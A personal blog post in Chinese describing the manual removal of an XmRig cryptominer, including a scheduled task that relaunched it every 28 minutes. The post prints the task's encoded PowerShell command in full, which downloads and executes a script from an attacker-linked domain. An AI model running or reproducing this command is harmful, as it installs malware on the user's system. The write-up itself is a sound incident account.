手动删除XmRigMiner挖矿病毒实录

昨天从网上下了某个BT种子的工具，第二天电脑卡的一匹，并且defender频繁报毒。由于报毒项名称是officekms.exe，由于之前是使用过kms激活office，所以先不管。另外有两项go.exe和goo.exe不断被杀，不断重生；在任务管理器里发现了一个进程叫XmRigMiner的进程，网上说是挖矿工具，在C:/ProgramData也发现挖矿工具，于是确定被植入挖矿病毒。 首先进入到目录C:/ProgramData，删除不明的程序，然后进入go.exe和goo.exe的目录C:/Users/Public，发现5个病毒文件，删除之；又发现一个文件夹"1"，里面看上去有大量不明文件，删除之。后来发现windows defender又报毒，程序又重生。立即删除了重生的文件。然后我把C盘和D盘翻了个底朝天，竟然一无所获。 后来发现病毒又重生，于是，发现矿机重生时powershell在后台运行，并且cpu比较高。于是结束了powershell。卡掉的机器直接就流畅了。所以判断恶意程序使用powershell重生。查看defender，发现昨天夜里病毒大量重生，且规律地每28分钟就重生一次； 怀疑是计划任务。打开计划任务管理程序，果然，发现一个可疑的计划任务，每隔28分钟运行powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA 后面的字符串看着就像base64，于是心中窃喜，到网上解码。 打开网址，就得到了明文的挖矿脚本。禁用这个计划任务，就阻止了病毒再生。珍爱计算机，远离不明软件。 (update 2020.10.16)事后一个月在网上查找，上面那网站是和匿影组织有关的网站，之前这个网站上挂了wannaren勒索病毒，到某一天就删掉了下载勒索病毒的代码只留下矿机。只中了挖矿病毒已经是一个比较好的结果了。这个网站到现在还没被墙，GFW真是个屑墙......